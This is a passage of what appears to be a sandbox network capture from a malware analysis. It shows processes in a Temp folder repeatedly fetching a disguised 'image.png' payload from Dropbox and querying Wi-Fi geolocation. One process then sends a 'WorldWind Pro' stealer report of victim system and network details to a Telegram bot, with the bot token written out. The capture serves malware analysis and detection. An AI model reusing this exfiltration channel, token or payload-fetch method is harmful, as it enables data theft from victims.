2024-07-06 11:28:29 UTC	1082	IN	Data Raw: 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34 39 33 36 20 Data Ascii: ath fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294936
2024-07-06 11:28:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49862	162.125.66.15	443	5184	C:\Users\user\AppData\Local\Temp\jqnnpe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:29 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-06 11:28:30 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:28:29 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 48d04f92f1ac43199464af56a5d91cbc Connection: close
2024-07-06 11:28:30 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49863	162.125.66.15	443	5184	C:\Users\user\AppData\Local\Temp\jqnnpe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:29 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-06 11:28:30 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:28:30 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 46ad6b05262e4619b51ae914000086da Connection: close
2024-07-06 11:28:30 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49865	162.125.66.15	443	5184	C:\Users\user\AppData\Local\Temp\jqnnpe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:31 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-06 11:28:31 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:28:31 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: f43c932cfa484fca9fc7ff80a7acadfa Connection: close
2024-07-06 11:28:31 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49866	162.125.66.15	443	5184	C:\Users\user\AppData\Local\Temp\jqnnpe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:31 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-06 11:28:31 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:28:31 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 4069f037958a44debf9ed35c1cac595e Connection: close
2024-07-06 11:28:31 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49869	162.125.66.15	443	5184	C:\Users\user\AppData\Local\Temp\jqnnpe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:32 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-06 11:28:33 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:28:32 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 1e8c8e9e1b2e44389c706f2a5c52b53c Connection: close
2024-07-06 11:28:33 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49872	162.125.66.15	443	5184	C:\Users\user\AppData\Local\Temp\jqnnpe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:34 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-06 11:28:34 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:28:34 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 67908c3c3d004af39cf20834f79e4f2b Connection: close
2024-07-06 11:28:34 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49874	162.125.66.15	443	5184	C:\Users\user\AppData\Local\Temp\jqnnpe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:35 UTC	107	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com Connection: Keep-Alive
2024-07-06 11:28:36 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:28:35 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: cd1660047af542a6a6de914b17b29109 Connection: close
2024-07-06 11:28:36 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49876	162.125.66.15	443	5184	C:\Users\user\AppData\Local\Temp\jqnnpe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:37 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-06 11:28:37 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:28:37 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: b9ae42e604aa4066aa9d8799a78b39ad Connection: close
2024-07-06 11:28:37 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49880	162.125.66.15	443	5184	C:\Users\user\AppData\Local\Temp\jqnnpe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:38 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-06 11:28:39 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:28:38 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 963840405bcb441eb4550f06d4fd0515 Connection: close
2024-07-06 11:28:39 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49882	172.67.196.114	443	5720	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:39 UTC	112	OUT	GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
2024-07-06 11:28:40 UTC	781	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:40 GMT Content-Type: application/json; charset=utf8 Content-Length: 88 Connection: close Access-Control-Allow-Origin: * Cache-Control: max-age=2678400 CF-Cache-Status: MISS Last-Modified: Sat, 06 Jul 2024 11:28:40 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9%2BC59zV1gESS1bAEHqBtOGvUf4SSCNkzn8GNOGPCRQmGtkXBJmdkzqSY1W1W0xGPJ3qZgkPICVoZisUqT5j4lG%2BYekIjvDyT67IqcOMj5ImWp9OSSvI1MMLEQze7B%2FLQOMk%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 89ef40a5afff41e7-EWR alt-svc: h3=":443"; ma=86400
2024-07-06 11:28:40 UTC	88	IN	Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 32 30 32 36 35 33 32 30 7d Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1720265320}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49885	162.125.66.15	443	5184	C:\Users\user\AppData\Local\Temp\jqnnpe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:39 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-06 11:28:40 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:28:40 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: d3386346e32345819c3a4031911030dc Connection: close
2024-07-06 11:28:40 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49887	149.154.167.220	443	5720	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:41 UTC	1720	OUT	GET /bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-07-06%207:27:22%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20134349%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201BUBDD%0ARAM:%204095MB%0AHWID:%209C8FCB6779%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20d [TRUNCATED] Host: api.telegram.org Connection: Keep-Alive
2024-07-06 11:28:41 UTC	347	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Sat, 06 Jul 2024 11:28:41 GMT Content-Type: application/json Content-Length: 137 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-07-06 11:28:41 UTC	137	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 63 61 6e 27 74 20 70 61 72 73 65 20 65 6e 74 69 74 69 65 73 3a 20 43 61 6e 27 74 20 66 69 6e 64 20 65 6e 64 20 6f 66 20 74 68 65 20 65 6e 74 69 74 79 20 73 74 61 72 74 69 6e 67 20 61 74 20 62 79 74 65 20 6f 66 66 73 65 74 20 39 31 35 22 7d Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: can't parse entities: Can't find end of the entity starting at byte offset 915"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49888	149.154.167.220	443	5720	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe

Timestamp	Bytes transferred	Direction	Data
